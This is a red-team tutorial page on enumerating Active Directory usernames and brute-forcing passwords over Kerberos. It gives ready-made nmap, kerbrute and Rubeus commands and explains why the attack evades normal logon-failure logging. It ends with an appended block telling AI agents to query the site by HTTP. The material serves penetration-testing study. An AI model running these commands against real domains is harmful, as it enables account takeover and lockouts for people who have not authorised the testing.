# User Enum and Brute Force

## **User Enumeration and Brute Force**

### Overview

In first place, due to Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has many advantages over brute-forcing other authentication methods, like the following:

* No domain account is needed to conduct the attack, just connectivity to the KDC.
* Kerberos pre-authentication errors are not logged in Active Directory with a normal Logon failure event (4625), but rather with specific logs to Kerberos pre-authentication failure (4771).
* Kerberos indicates, even if the password is wrong, whether the username is correct or not. This is a huge advantage in case of performing this sort of technique without knowing any username.
* In Kerberos brute-forcing it is also possible to discover user accounts without pre-authentication required, which can be useful to perform an ASREPRoast attack.

However, by carrying out a brute-force attack it is also possible to **block user accounts**. Thus, this technique should be used carefully.

### **User Enumeration Execution**

With nmap:

```
nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list] [DC IP]
```

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```
python kerbrute.py userenum -d test.local usernames.txt
```

### **Brute-force Execution**

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```
# with a list of users
.\\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file> 
```

Resources

<https://www.attackdebris.com/?p=311>

<https://www.tarlogic.com/blog/how-to-attack-kerberos/#Kerberos_brute-force>

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a#bruteforcing>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xa1mn.gitbook.io/cyber-explained/red-teaming/attacking-kerberos/user-enum-and-brute-force.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.